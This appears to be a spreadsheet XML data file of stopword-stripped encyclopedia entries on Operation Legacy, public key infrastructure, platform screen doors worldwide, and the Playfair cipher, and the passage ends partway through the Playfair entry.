    <t>operation legacy british colonial office (later foreign office) programme destroy hide files, prevent inherited ex-colonies. 1950s 1970s, decolonisation british empire height.mi5 special branch agents vetted secret documents colonial administrations find could embarrass british government—for instance showing racial religious bias. they identified 8,800 files conceal least countries territories 1950s 1960s, destroyed sent united kingdom. precise instructions given methods used destruction, including burning dumping sea. some files detailed torture methods used opponents colonial administrations, uprising.as decolonisation progressed, british officials keen avoid repeat embarrassment caused overt burning documents took place delhi 1947, covered indian news sources. 1961, iain macleod, secretary state colonies, wrote telegram british embassies advise best retrieve dispose sensitive documents. prevent post-colonial governments ever learning operation legacy, officials required dispatch "destruction certificates" london. cases, handover date approached, immolation task proved huge colonial administrators warned foreign office danger "celebrating independence smoke."academic study british empire assisted recent years declassification migrated archives foreign commonwealth office (fco) series. after government admitted 2011 secret documents related uprising, began declassify documents november 2013 20,000 files declassified. these documents accessed national archives kew, london. references external links "mau mau". radiolab. wnyc. july 2015. retrieved august 2017.</t>
  </si>
  <si>
    <t>Public-key cryptography</t>
  </si>
  <si>
    <t>Public key infrastructure</t>
  </si>
  <si>
    <t>public infrastructure (pki) roles, policies, hardware, software procedures needed create, manage, distribute, use, store revoke digital certificates manage public-key encryption. purpose facilitate secure electronic transfer information range network activities e-commerce, internet banking confidential email. required activities simple passwords inadequate authentication method rigorous proof required confirm identity parties involved communication validate information transferred. cryptography, arrangement binds public keys respective identities entities (like people organizations). binding established process registration issuance certificates certificate authority (ca). depending assurance level binding, carried automated process human supervision. when done network, requires using secure certificate enrollment certificate management protocol cmp. role delegated assure valid correct registration called registration authority (ra). basically, responsible accepting requests digital certificates authenticating entity making request. internet engineering task force's 3647 defines entity responsible following functions: identification authentication certificate applicants, approval rejection certificate applications, initiating certificate revocations suspensions certain circumstances, processing subscriber requests revoke suspend certificates, approving rejecting requests subscribers renew re-key certificates. ras, however, sign issue certificates (i.e., delegated certain tasks behalf ca)." while microsoft referred subordinate incorrect according x.509 standards. signing authority manage vetting provisioning certificates. microsoft case, functionality provided either microsoft certificate services site active directory certificate services enforces microsoft enterprise certificate policy certificate templates manages certificate enrollment (manual auto-enrollment). case microsoft standalone cas, function exist since procedures controlling based administration access procedure associated system hosting rather active directory. most non-microsoft commercial solutions offer stand-alone component. entity must uniquely identifiable within domain basis information entity. third-party validation authority (va) provide entity information behalf x.509 standard defines commonly used format public certificates. capabilities provides "trust services" plain terms trusting actions outputs entities, people computers. trust service objectives respect following capabilities: confidentiality, integrity authenticity (cia). confidentiality: assurance entity maliciously unwittingly view payload clear text. data encrypted make secret, even read, appears gibberish. perhaps common confidentiality purposes context transport layer security (tls). capability underpinning security data transit, i.e. transmission. classic example confidentiality using internet browser service hosted internet based site entering password. integrity: assurance entity changed (tampered) transmitted data slightest way, would obvious happened integrity would compromised. often utmost importance prevent integrity compromised (tamper proof), however, utmost importance integrity compromised clear evidence done (tamper evident). authenticity: assurance certainty connecting evidencing legitimacy connecting protected service. former termed server-side authentication typically used authenticating server using password. latter termed client-side authentication sometimes used authenticating using smart card (hosting digital certificate private key). design public cryptography cryptographic technique enables entities securely communicate insecure public network, reliably verify identity entity digital signatures.a public infrastructure (pki) system creation, storage, distribution digital certificates used verify particular public belongs certain entity. creates digital certificates public keys entities, securely stores certificates central repository revokes needed.a consists certificate authority (ca) stores, issues signs digital certificates; registration authority (ra) verifies identity entities requesting digital certificates stored central directory—i.e., secure location keys stored indexed; certificate management system managing things like access stored certificates delivery certificates issued; certificate policy stating pki's requirements concerning procedures. purpose allow outsiders analyze pki's trustworthiness. methods certification broadly speaking, traditionally three approaches getting trust: certificate authorities (cas), trust (wot), simple public infrastructure (spki). certificate authorities primary role digitally sign publish public bound given user. this done using ca's private key, trust user relies one's trust validity ca's key. when third party separate user system, called registration authority (ra), separate key-to-user binding established, depending level assurance binding has, software human supervision. term trusted third party (ttp) also used certificate authority (ca). moreover, often used synonym implementation. certificate revocation authorities webpki provide revocation services allow invalidation previously issued certificates. according baseline requirements ca/browser forum, must maintain revocation status certificate expiration. status must delivered using online certificate status protocol. most revocation statuses internet disappear soon expiration certificates. issuer market share model trust relationships, trusted third party trusted subject (owner) certificate party relying upon certificate. according netcraft report 2015, industry standard monitoring active transport layer security (tls) certificates, states "although global [tls] ecosystem competitive, dominated handful major three certificate authorities (symantec, sectigo, godaddy) account three-quarters issued [tls] certificates public-facing servers. spot held symantec verisign purchased symantec) ever since [our] survey began, currently accounting third certificates. illustrate effect differing methodologies, amongst million busiest sites symantec issued valid, trusted certificates significantly overall market share." following major issues certificate issuing managed, major players gradually distrusted symantec issued certificates starting 2017. temporary certificates single sign-on this approach involves server acts offline certificate authority within single sign-on system. single sign-on server issue digital certificates client system, never stores them. users execute programs, etc. temporary certificate. common find solution variety x.509-based certificates.starting 2020, certificate validity reduced months. trust alternative approach problem public authentication public information web-of-trust scheme, uses self-signed certificates third-party attestations certificates. singular term "web trust" imply existence single trust, common point trust, rather number potentially disjoint "webs trust". examples implementations approach (pretty good privacy) gnupg implementation openpgp, standardized specification pgp). because implementations allow e-mail digital signatures self-publication public information, relatively easy implement one's trust. benefits trust, pgp, interoperate fully trusted parties domain (such internal company) willing guarantee certificates, trusted introducer. "web trust" completely trusted then, nature trust, trusting certificate granting trust certificates web. valuable standards practices control issuance certificates including personally instituted trust could significantly degrade trustworthiness enterprise's domain's implementation pki.the trust concept first forth creator phil zimmermann 1992 manual version 2.0: time goes accumulate keys people want designate trusted introducers. everyone else choose trusted introducers. everyone gradually accumulate distribute collection certifying signatures people, expectation anyone receiving trust least signatures. this cause emergence decentralized fault-tolerant confidence public keys. simple public infrastructure another alternative, deal public authentication public information, simple public infrastructure (spki) grew three independent efforts overcome complexities x.509 pgp's trust. spki associate users persons, since trusted, rather person. spki notion trust, verifier also issuer. this called "authorization loop" spki terminology, authorization integral design. this type specially useful making integrations rely third parties certificate authorization, certificate information, etc.; good example air-gapped network office. decentralized decentralized identifiers (dids) eliminates dependence centralized registries identifiers well centralized certificate authorities management, standard hierarchical pki. cases registry distributed ledger, entity serve root authority. this architecture referred decentralized (dpki). history developments occurred early 1970s british intelligence agency gchq, james ellis, clifford cocks others made important discoveries related encryption algorithms distribution. because developments gchq highly classified, results work kept secret publicly acknowledged mid-1990s. public disclosure secure exchange asymmetric algorithms 1976 diffie, hellman, rivest, shamir, adleman changed secure communications entirely. with development high-speed digital electronic communications (the internet predecessors), need became evident ways users could securely communicate other, consequence that, ways users could sure actually interacting. assorted cryptographic protocols invented analyzed within cryptographic primitives could effectively used. with invention world wide rapid spread, need authentication secure communication became still acute. commercial reasons alone (e.g., e-commerce, online access proprietary databases browsers) sufficient. taher elgamal others netscape developed protocol ('https' urls); included establishment, server authentication (prior one-way only), structure thus created users/sites wishing secure communications. vendors entrepreneurs possibility large market, started companies projects existing companies), began agitate legal recognition protection liability. american association technology project published extensive analysis foreseeable legal aspects operations (see digital signature guidelines), shortly thereafter, several u.s. states (utah first 1995) jurisdictions throughout world began enact laws adopt regulations. consumer groups raised questions privacy, access, liability considerations, taken consideration jurisdictions others. enacted laws regulations differed, technical operational problems converting schemes successful commercial operation, progress much slower pioneers imagined would first years 21st century, underlying cryptographic engineering clearly easy deploy correctly. operating procedures (manual automatic) easy correctly design (nor even designed, execute perfectly, engineering required). standards existed insufficient. vendors found market, quite market envisioned mid-1990s, grown slowly somewhat different ways anticipated. pkis solved problems expected several major vendors gone business acquired others. success government implementations; largest implementation date defense information systems agency (disa) infrastructure common access cards program. uses pkis type another, several vendors, many uses, including providing public keys bindings user identities used for: encryption and/or sender authentication e-mail messages (e.g., using openpgp s/mime); encryption and/or authentication documents (e.g., signature encryption standards documents encoded xml); authentication users applications (e.g., smart card logon, client authentication ssl/tls). there's experimental usage digitally signed http authentication enigform mod_openpgp projects; bootstrapping secure communication protocols, internet exchange (ike) ssl/tls. these, initial set-up secure channel "security association") uses asymmetric key—i.e., public key—methods, whereas actual communication uses faster symmetric key—i.e., secret key—methods; mobile signatures electronic signatures created using mobile device rely signature certification services location independent telecommunication environment; internet things requires secure communication mutually trusted devices. public infrastructure enables devices obtain renew x.509 certificates used establish trust devices encrypt communications using tls. open source implementations openssl simplest form tool pki. toolkit, developed included major linux distributions, used build (simple) pki-enable applications. (apache licensed) ejbca full-featured, enterprise-grade, implementation developed java. used internal service. (lgpl licensed) xipki, ocsp responder. with sha-3 support, implemented java. (apache licensed) graphical interface, database. uses openssl underlying operations. dogtag full featured developed maintained part fedora project. cfssl open source toolkit developed cloudflare signing, verifying, bundling certificates. (bsd 2-clause licensed) vault tool securely managing secrets (tls certificates included) developed hashicorp. (mozilla public license licensed) boulder, acme-based written boulder software runs let's encrypt. criticism some argue purchasing certificates securing websites ssl/tls securing software code signing costly venture small businesses. however, emergence free alternatives, let's encrypt, changed this. http/2, latest version http protocol, allows unsecured connections theory; practice, major browser companies made clear would support protocol secured connection. browser implementation http/2 including chrome, firefox, opera, edge supports http/2 using alpn extension protocol. this would mean that, speed benefits http/2, website owners would forced purchase ssl/tls certificates controlled corporations. currently majority browsers shipped pre-installed intermediate certificates issued signed certificate authority, public keys certified so-called root certificates. this means browsers need carry large number different certificate providers, increasing risk compromise.when known compromised, could fixed revoking certificate, compromise easily detectable huge security breach. browsers issue security patch revoke intermediary certificates issued compromised root certificate authority. also cryptographic agility (crypto-agility) certificate management protocol (cmp) certificate management (cmc) simple certificate enrollment protocol (scep) enrollment secure transport (est) automated certificate management environment (acme) references external links market share trends certificate authorities (w3techs)</t>
  </si>
  <si>
    <t>Platform screen doors</t>
  </si>
  <si>
    <t>platform screen doors (psds), also known platform edge doors (peds), used train, rapid transit people mover stations separate platform train tracks, well rapid transit, tram light rail systems. primarily used passenger safety, relatively addition many metro systems around world, retrofitted established systems. they widely used newer asian european metro systems, latin american rapid transit systems. history idea platform edge doors dates early 1908, charles shute boston granted patent "safety fence gate railway-platforms". invention consisted fence railway platform edges", composed series pickets bolted platform edge, vertically movable pickets could retract platform edge train station. 1917, carl albert west granted patent "gate subrailways like". invention provided spaced guides secured tunnel's side wall, gate ends guided guides, ends intermediate portions gate rollers engaging side wall". pneumatic cylinders pistons would used raise gates platform train station. unlike shute's invention, entire platform gate movable, retract upward.the first stations world platform screen doors stations saint petersburg metro's line opened 1961 1972. platform "doors" actually openings station wall, supports ceiling platform. track tunnels adjoining stations' island platforms built tunnel boring machines (tbms), island platforms actually located separate vault track tunnels. usually, tbms bore deep-level tunnels stations, station vaults manually contain tracks platform. however, case saint petersburg metro, tbms bored pair continuous tunnels passed stations, stations built vaults contained platform, small openings sides vault, order passengers access trains tunnels.singapore's mass rapid transit opened 1987 often described first heavy metro system world incorporate psds stations climate control safety reasons, rather architectural constraints, though light lille metro opened 1983 predates types although terms often used interchangeably, platform screen doors refer full-height half-height barriers. full height platform screen doors total barriers station floor ceiling, half-height platform screen doors referred platform edge doors automatic platform gates, reach ceiling thus create total barrier. platform gates usually half height full-screen doors, chest-height sliding doors edge railway platforms prevent passengers falling platform edge onto railway tracks. sometimes reach height train. like full-height platform screen doors, platform gates slide open close simultaneously train doors. these types platform screen doors presently main types world. platform screen doors platform edge doors these doors help prevent people accidentally falling onto tracks, getting close moving trains, committing suicide jumping) homicide pushing). prevent reduce wind felt passengers caused piston effect could circumstances make people lose balance. improve safety—reduce risk accidents, especially trains passing station high speeds. improve climate control within station (heating, ventilation, conditioning effective station physically isolated tunnel). improve security—access tracks tunnels restricted. lower costs—eliminate need motormen conductors used conjunction automatic train operation, thereby reducing manpower costs. prevent litter buildup tracks, fire risk, well damage possibly obstruct trains. improve sound quality platform announcements, background noise tunnels trains entering exiting reduced. underground indoor platforms, prevent polluted fumes caused friction train wheels grinding tracks.their primary disadvantage cost; installing system typically costs several million station. when used retrofit older systems, limit kind rolling stock used line, train doors must exactly spacing platform doors; results additional costs depot upgrades otherwise unnecessary purchases rolling stock. despite delivering overwhelming improvement passenger safety platform-train interface, platform screen doors introduce hazards must carefully managed design delivery. principal hazard entrapment closed platform doors train carriage which, undetected, lead fatality train begins move (see incidents). cases happening rare, risk minimised careful design, particular interlocking door system signalling system, minimising closed platform doors train body. cases active monitoring systems used monitor gap. half-height platform edge doors, also known automatic platform gates, cheaper install full-height platform screen doors, require metallic framework support. some railway operators therefore prefer option improve safety railway platforms and, time, keep costs non-air-conditioned platforms naturally ventilated. however, gates less effective full platform screen doors preventing people intentionally jumping onto tracks. these gates first practical hong kong disneyland resort line open-air station designs. most half-height platform edge door designs taller designs ones installed disneyland resort line. rope-type screen doors there also rope-type platform screen doors, multiple train types different length train door structures platforms. barriers move upwards, rather sideways, letting passengers through. some japanese, korean, chinese eastern european countries railway stations rope-type screen doors lower cost installation deal problem different train types distance doors. argentina line buenos aires subte planned platform screen doors installed future soon cbtc system installed. australia sydney metro northwest, initial section sydney metro, opened 2019, first-fully automated rapid transit rail system australia. full-height screen doors provided underground platforms, half-height doors at-grade, elevated underground platforms. existing five stations epping chatswood railway line upgraded rapid transit standard, fitted half-height platform screen doors.in melbourne, metro tunnel, south kensington south yarra, open 2025, platform screen doors underground stations. rolling stock constructed, doors line full-height ones platforms. cross river rail brisbane, currently construction scheduled open 2024, platform screen doors boggo road, woolloongabba albert street underground stations, underground platforms roma street. austria line vienna u-bahn reconstructed schottentor station karlsplatz station, addition platform screen doors reconstructed stations 2023-2024. belarus platform screen doors added line minsk metro, opened late 2020. brazil platform screen doors present paulo metro since 2010, sacomã station opened. 2019, lines paulo metro equipment: line yellow line silver equipment installed stations. feature also present stations line green, line line lilac. they planned installed stations lines 2021, well stations line 2020.psds also found tube stations santos light rail since 2016. bulgaria half-height platform screen doors stations sofia metro line 3.in 2020, rope-type screen door (rsd) system installed vasil levski stadium metro station opalchenska metro station sofia metro line line total, rope-type safety barriers installed busiest stations line sofia metro, providing increased safety passengers protecting accidental falls. canada screen doors three link train stations union pearson stations along union pearson express route toronto pearson international airport mississauga, ontario. greater montreal's forthcoming réseau express métropolitain (rem), 67-kilometre-long driverless complementary suburban rapid transit network opening five phases 2022 2024 feature screen doors stations. with advent horizon, calls retrofit platform edge doors montreal metro combat delays arising overcrowding becoming common. full-height doors installed, reduce difficulty opening station entrance doors ground level pressure imbalance caused passing trains. given different train door layouts montreal metro, older mr-73 trains doors side car, mpm-10 unlikely platform doors showing montreal metro retirement mr-73 fleet. chile platform edge doors currently lines santiago metro, novelty system. china chinese metro systems platform screen doors installed lines. stations built 2000s form platform barrier. only dalian metro line wuhan metro line changchun metro line stations without platform screen doors early lines september 2019). however many starting process retrofitting lines platform screen gates. addition, many systems guangzhou rapid transit also equipped platform screen doors. platform screen doors also present tram light rail stops xijiao light rail, nanjing tram chengdu tram, well rapid transit stops. several underground high speed railway stations network platform screen doors back platform edge. addition, fengxian district shanghai installed platform gates road crossing. colombia several stations bogota's transmilenio rapid transit system platform screen doors. denmark copenhagen metro uses westinghouse faiveley platform screen doors platforms. full-height doors used underground stations surface level stations half-height doors (except lufthavnen orientkaj) finland helsinki metro trial faiveley automatic platform gates installed single platform vuosaari metro station phase project. doors, part siemens metro automation project, built 2012. phase project delayed metro automation technical safety related testings. doors removed 2015. france lines automated subway system equipped platform screen doors every station, starting lille subways 1983. those also include toulouse rennes well cdgval orlyval airport shuttles. paris métro's line saint-lazare bibliothèque françois mitterrand inaugurated 1998 platform screen doors manufactured faiveley transport. station olympiades opened platform screen doors june 2007. line retrofitted platform edge doors, full driverless automation effective 2012. some stations line platform edge doors since 2010 manage overcrowding, tests conducted 2006, stations line currently fitted platform edge doors preparation automation. since june 2020, kind vertical platform screen doors, called platform curtains, tested platform 2bis vanves–malakoff station paris region) transilien line commuter rail line. experiment february 2021. transilien said preferred platform curtains classical screen doors line positioning doors across rolling stock, plan install transilien stations experiment successful. germany people movers frankfurt international airport, munich international airport düsseldorf airport equipped platform screen doors, well suspended monorail dortmund, called h-bahn. plans underway test platform screen doors munich u-bahn 2023 line installed late 2026. greece platform screen doors used driverless thessaloniki metro, opens november 2023 line athens metro. hong kong currently, heavy rail medium-capacity railway platforms outside east rail line equipped either platform screen doors platform edge doors. east rail line, psds installed admiralty, exhibition centre hung stations. platform edge doors used at-grade elevated stations, platform screen doors used underground at-grade elevated stations. none light rail platforms platform screen doors platform edge doors. 1998, tung chung line airport express earliest operations platform screen doors hong kong.the corporation also, since mid-1996, studying feasibility installing psds older stations. decided 1999 undertake retrofitting programme platforms underground stations kwun tong, island, tsuen lines. this completed early 2006. mass transit railway first metro system world retrofit psds transit system already operation.in 2006 began studying ways introduce barriers above-ground at-grade stations, considered complicated stations naturally ventilated introduction platform screen doors would entail installation conditioning systems. 2008 corporation decided install automatic platform gates eight stations (the corporation limited corporation operationally merged 2007, stations except study). eight stations retrofitted apgs 2011. from july 2000 december 2013, corporation collected surcharge cents octopus-paying passenger help installation psds apgs. over hk$1.15 billion collected total.platform screen doors also installed platforms west rail line (now part tuen line), built kowloon-canton railway corporation (kcrc) mtr–kcr merger. shan line gates upon opening even though built time west rail; eventually added 2014 2017 prior opening first phase tuen line february 2020. installation platform screen doors hong kong effective reducing railway injuries service disruptions.the longest platform screen doors world found east tsim tsui station. reduction train length cars following construction kowloon southern link caused many screen doors service, although trains lengthened eight cars 2018. platform screen doors presently service supplied swiss manufacturer kaba gilgen, japanese nabtesco corporation (under nabco brand), french faiveley transport shenzhen fangda automatic system. last non-tram/​light rail stations hong kong without platform screen doors gates east rail line, former line part retrofitting programmes. however, thirteen stations retrofitted kaba part central link project. 2022, three stations east rail line (hung hom, exhibition centre, admiralty) equipped platform screen doors, remaining stations doors future. adding apgs east rail line platforms requires platform strengthening gates, combined heavy winds, greatly increase structural loading platform edge. apart mtr, stations hong kong international airport automated people mover equipped platform screen doors made westinghouse platform screen doors (for phase panasonic (for midfield extension).the platforms shuttle service north satellite concourse east hall terminal hkia, chek kok, territories platforms square kwun tong, kowloon also retrofitted psds. india delhi metro, stations delhi airport metro express line, links indira gandhi international airport equipped full-height platform screen doors since november 2015 busiest stations yellow line also equipped half height platform gates. automatic platform gates stations pink, magenta line grey line. platform screen doors also used underground stations chennai metro.there platform screen doors elevated stations kolkata metro line platform screen doors introduced underground stations kolkata metro line kolkata metro line kolkata metro line there plans install platform screen doors also kolkata metro line 1.on namma metro bangalore, platform doors installed phase operations expected completed 2019.on mumbai metro, lines made mmrda half-height platform screen doors elevated stations full-height platform screen doors underground stations, trains used lines level also reduce risk passenger deaths overcrowding. line yellow line, line line line aqua line, full-height platform screen doors, line fully underground, like mmrda lines above, level (unattended train operation).all stations pune metro platform screen doors. indonesia soekarno–hatta airport skytrain, opened 2017, full-height platform screen doors. jakarta mrt, opened 2019, full-height psds underground stations half-height psds elevated stations. jakarta lrt, opened 2019, half-height psds. greater jakarta lrt, open 2022, half-height platform screen doors. psds used transjakarta stops, often broken turned off. italy platform screen doors used newly built rapid transit lines systems construction italy. psds present turin metro, venice people mover, perugia minimetrò, brescia metro, line milan metro, line rome metro. japan tokyo metro toei subway began using barriers 1991 opening namboku line (which full-height platform screen doors), subsequently installed automatic platform gates mita, marunouchi, fukutoshin lines. some railway lines, including subway systems sapporo, sendai, nagoya, osaka, kyoto, fukuoka, also utilize barriers extent. august 2012, japanese government announced plans install barriers stations used 100,000 people day, ministry land, infrastructure, transport tourism allotted million ($470,800) research development system 2011-2012 fiscal year. difficulty fact stations used different types trains different designs, making barrier design challenge.as november 2012, stations 100,000 users able implement plan. ministry stated approximately 9,500 train stations across japan barriers. tokyo metro stations, type platform barrier.in 2018, automatic platform gates installed sōbu rapid line platforms shin-koiwa. trains (980 long, believed break world record longest platform doors east tsim tsui station hong kong. malaysia platform screen doors (psd) installed underground kelana jaya line stations, ampang park masjid jamek kajang line, muzium negara maluri stations. automated announcement message reading "for safety reasons, please stand behind yellow line" english malay languages also heard train arrived stations. there also platform screen doors (psd) klia ekspres kuala lumpur sentral klia stations. both stations klia aerotrain also platform screen doors. platform screen gates (psg) also installed elevated stations kajang line monorail. mexico platform screen doors present various rapid transit systems mexico, stations guadalajara macrobús ecovía system monterrey. platform screen doors seen well aerotrén, airport people mover mexico city international airport. philippines half-height platform screen doors shall installed north–south commuter railway, full-height platform screen doors shall installed metro manila subway. system sought open stages 2022 2025. peru full-height platform screen doors used underground stations line lima metro, open 2022. qatar platform screen doors stations doha metro. they also found lusail tram. russia park pobedy (russian: парк победы) station saint petersburg metro first station world platform doors. station opened 1961. later, nine stations type built leningrad (nowadays saint petersburg): petrogradskaya (russian: петроградская), vasileostrovskaya (russian: василеостровская), gostiny dvor (russian: гостиный двор), mayakovskaya (russian: маяковская), ploshchad alexandra nevskogo (russian: площадь александра невского-1), moskovskaya (russian: московская), yelizarovskaya (russian: елизаровская), lomonosovskaya (russian: ломоносовская), zvyozdnaya (russian: звёздная). there electronic device ensure train stopped doors adjacent platform doors; installed driverless trains could eventually used lines. line uses goa2 automatic train operation make easier, however, line not. unlike platform screen doors, lightweight units extensive glazing installed normal platform edge, petersburg units give appearance solid wall heavyweight doorways solid steel sliding doors, similar bank elevators large building, train cannot seen entering platform; passengers become familiar sound alone indicate train arrival. 2018, similar stations opened: novokrestovskaya begovaya. unlike first stations built, stations utilize glass screen doors, allowing train seen entering platform, like systems. unclear platform doors installed absent metros russia, (except minsk, shown above), former eastern bloc (excluding sofia, also shown above, albeit line equipment incompatible typical eastern bloc metro). platform doors russia found sheremetyevo international airport people mover. singapore mass rapid transit (mrt) first rapid transit system asia incorporate platform screen doors stations 1987. full height psds mainly manufactured westinghouse installed underground sub-surface stations, half-height platform screen doors retrofitted elevated stations march 2012. stations bukit panjang, sengkang punggol lack physical doors, barriers openings doors (excluding now-closed mile junction station, full height doors) vary size according location platform.there variants full-height platform screen doors use. first variant, made westinghouse, installed underground stations along north south line east west line 1987 completion initial system 1990. second variant incorporating glass doors since used lines thereafter.considered novelty time installation, platform screen doors introduced primarily minimise hefty air-conditioning costs, especially since elevated stations air-conditioned much economical comparison. safety aspects doors became important light high-profile incidents individuals injured killed oncoming trains. 2008, authorities began process retrofitting existing elevated stations half-height screen doors. however, land transport authority stated retrofit motivated need make stations safe, "but prevent system-wide delay service disruption reduce social cost commuters caused track intrusions." retrofit completed 2012. south korea yongdu station seoul subway line first station seoul subway feature platform screen doors; station opened october 2005. 2009, many stations operated seoul metro platform doors hyundai elevator. seoul metro lined equipped platform screen doors. however, stations operated korail completed installation. stations south korea platform screen doors 2018. 2017, 100% subway stations equipped platform screen doors daejeon, gwangju, busan, incheon daegu.the platform screen doors, installed munyang station daegu metro line korea transport institute 2013, unique rope-based platform screen named rope type platform safety door (rpsd). door sets rope blocks separate platform rails. when train arrives, rope screen door sets vertically opened allow passenger boarding train. this rpsd also used nokdong station gwangju metro line removed 2012, full-height platform screen door installed 2016 instead. spain half platform screens installed first provença station (barcelona) around 2003. later doors tested barcelona metro line fitting stations lines operate driverless. platform doors also found madrid barajas airport people mover adolfo suárez madrid–barajas airport. sweden stockholm commuter rail platform doors underground stations opened july 2017, part stockholm city line. stockholm metro test platform doors åkeshov metro station 2015 bagarmossen metro station 2021, metro stations including kungsträdgården metro station-nacka kungsträdgården metro station-hagsätra metro station platform screen doors completed 2026-2030. multiple door layouts stockholm metro full length doors side, older series newer 24), unlikely platform doors common anytime soon. underground liseberg station gothenburg platform doors built opening 1993. reason safety freight trains tunnel. these doors built meter platform edge restrict train type. switzerland zurich international airport's skymetro shuttle main building (hosting terminals detached terminal glass screen doors separating tracks passenger hall platforms ends. lausanne metro's line glass screen doors every station. taiwan taipei metro, platform screen doors first installed wenhu line (then known muzha line) 1996. older high-capacity lines (tamsui-xinyi line, songshan-xindian line, zhonghe-xinlu line, bannan line) initially constructed without platform screen doors retrofitted automatic platform gates since 2018. newer stations, xinyi line (part tamsui-xinyi line), luzhou xinzhuang line (part zhonghe-xinlu line), songshan line (part songshan-xindian line), circular line, part bannan line's dingpu station taipei nangang exhibition center station) constructed platform screen doors. circular line installed platform screen doors since opening, danhai light rail not. kaohsiung metro, underground stations installed platform screen doors, elevated stations not. daliao station installed half-height platform screen doors 2020. taoyuan metro taichung metro, elevated stations installed half-height platform screen doors underground stations installed full-height platform screen doors. thailand platform screen doors first installed skytrain bangkok system since first operates. followed airport rail link system makkasan station (express platform) suvarnabhumi station (both city express line platform. skytrain system first installed platform screen doors siam station. followed busy stations rush hours. today, almost stations bangkok electrified rail system installed platform screen doors preventing people falling onto tracks. skytrain system installed psds stations stations. both purple blue line bangkok system installed psds stations. airport rail link installed stainless steel fence prevent falling installed automated door speed train fast break glass. stations bangkok must install platform screen doors rule. turkey platform doors found istanbul metro lines fully driverless. some stations line also platform doors. united arab emirates platform screen doors installed platforms fully automated dubai metro, well dubai airport people mover, palm jumeirah monorail dubai tram (the world's first tram system feature platform screen doors). united kingdom jubilee line extension project platform edge doors installed stations underground, produced westinghouse. there plans install peds existing london underground stations along bakerloo, central, piccadilly, waterloo city lines part tube london. provision installing platform edge doors found northern line extension stations, doors installed stations opened 2021.peds present gatwick airport shuttle system, heathrow airport terminal airside people-mover shuttle, birmingham airport airrail link stansted airport transit system. elizabeth line, cross-city line london (delivered crossrail project) platform screen doors sixteen sub-surface platforms central section. each platform twenty-seven doors align twenty-seven saloon doors british rail class operates service. doors form 2.5m high glass steel screen entire length platform. door opening 2.1m wide, system includes integrated passenger information digital advertising screens. system unusual trains served full-sized commuter trains, larger longer trains metro systems commonly equipped platform screen doors. total, platform screen provided. glasgow subway half-height screen doors rolling stock introduced 2022. united states platform screen doors rare united states, exception, exclusively found small-scale systems. vegas monorail system currently general-purpose rapid transit system platform screen doors. honolulu rail transit become first large-scale publicly metro system united states feature platform screen doors, opens 2022. york city's metropolitan transportation authority committed installing platform screen doors subway system, though considering idea since 1980s. their installation presents substantial technical challenges, part different placements doors york city subway rolling stock. additionally, majority system cannot accommodate platform doors regardless door locations, factors narrow platforms structurally insufficient platform slabs (see technology york city subway platform screen doors). following series incidents week november 2016, three people injured killed pushed tracks, started consider installing platform edge doors 42nd street shuttle. october 2017, formally announced platform screen doors would installed third avenue station train part pilot program, pilot later postponed. following several pushing incidents, announced pilot program three stations february 2022: &lt;7&gt;​ trains' platform times square; train's platform sutphin boulevard–archer avenue–jfk airport; third avenue station.people movers, systems ferry passengers across large distances would otherwise walk, make platform screen doors. these systems common airports hartsfield–jackson atlanta international airport denver international airport. port authority york jersey uses full height platform screen doors systems: airtrain airtrain newark (serving john kennedy international airport newark liberty international airport respectively). francisco international airport airtrain, 6-mile-long line whose stations fully enclosed platform screen doors, allowing access fully automated people mover. chicago o'hare international airport people mover system operates hours mile long line operates four terminals airport parking areas; station fully enclosed platform screen doors allowing access fully automated people mover trains. aerotrain 3.78-mile (6.08 people mover system washington dulles international airport dulles, virginia fully enclosed tracks including platform screen doors. united states capitol subway system, train cart people mover system, uses platform gates. venezuela platform screen doors teques metro. first station screen doors implemented system guaicaipuro. incidents shanghai metro 2007, forcing onto crowded train became trapped train door platform door closed. pulled departing train killed. 2010, woman shanghai's zhongshan park station killed circumstances trapped train platform doors. almost identical death occurred beijing subway 2014 ‍—‌the third death involving platform doors china within several years preceding 2018, woman similarly trapped platform doors train shanghai's bao'an highway station. escaped injury standing still train departed. january 2022, elderly woman killed trapped train doors platform screen doors shanghai's qi'an road station.between 1999 2012, london underground's platform doors, jubilee line, cause injuries including strikes peoples' heads arms. references external links media related platform screen doors wikimedia commons</t>
  </si>
  <si>
    <t>Playfair cipher</t>
  </si>
  <si>
    <t>playfair cipher playfair square wheatstone–playfair cipher manual symmetric encryption technique first literal digram substitution cipher. scheme invented 1854 charles wheatstone, bears name lord playfair promoting use. technique encrypts pairs letters (bigrams digrams), instead single letters simple substitution cipher rather complex vigenère cipher systems use. playfair thus significantly harder break since frequency analysis used simple substitution ciphers work frequency analysis bigrams possible, considerably difficult. with possible bigrams rather possible monograms (single symbols, usually letters context), considerably larger cipher text required order useful. history playfair cipher first cipher encrypt pairs letters cryptologic history. wheatstone invented cipher secrecy telegraphy, carries name friend lord playfair, first baron playfair andrews, promoted use. first recorded description playfair cipher document signed wheatstone march 1854. initially rejected british foreign office developed perceived complexity. wheatstone offered demonstrate three four boys nearby school could learn minutes, under secretary foreign office responded, "that possible, could never teach attachés."it however later used tactical purposes british forces second boer world purpose british australians world this playfair reasonably fast requires special equipment pencil paper. typical scenario playfair protect important non-critical secrets actual combat e.g. fact artillery barrage smoke shells would commence within minutes cover soldiers' advance towards next objective. time enemy cryptanalysts could decode messages hours later, information would useless longer relevant.during world government zealand used communication among zealand, chatham islands, coastwatchers pacific islands. coastwatchers established royal australian navy intelligence also used cipher. superseded playfair longer used military forces advent digital encryption devices. this cipher regarded insecure purpose, modern computers could easily break within microseconds. first published solution playfair cipher described 19-page pamphlet lieutenant joseph mauborgne, published 1914. william friedman described 1942 providing little security. description playfair cipher uses table containing word phrase. memorization keyword simple rules required create table cipher. generate table, would first fill spaces table modified polybius square) letters keyword (dropping duplicate letters), fill remaining spaces rest letters alphabet order (usually omitting reduce alphabet fit; versions space). written rows table, left right, pattern, spiral beginning upper-left-hand corner ending center. keyword together conventions filling table constitute cipher key. encrypt message, would break message digrams (groups letters) that, example, "helloworld" becomes ld". these digrams substituted using table. since encryption requires pairs letters, messages number characters usually append uncommon letter, "x", complete final digram. letters digram considered opposite corners rectangle table. perform substitution, apply following rules, order, pair letters plaintext: letters letter left), first letter. encrypt pair continue. some variants playfair instead "x", letter, uncommon repeated pair, letters appear table, replace letters immediate right respectively (wrapping around left side letter original pair right side row). letters appear column table, replace letters immediately respectively (wrapping around side column letter original pair bottom side column). letters column, replace letters respectively pair corners rectangle defined original pair. order important first letter encrypted pair lies first letter plaintext pair.to decrypt, inverse (opposite) shift rules, selecting letter left upwards appropriate. last rule remains unchanged, transformation switches selected letters rectangle opposite diagonal, 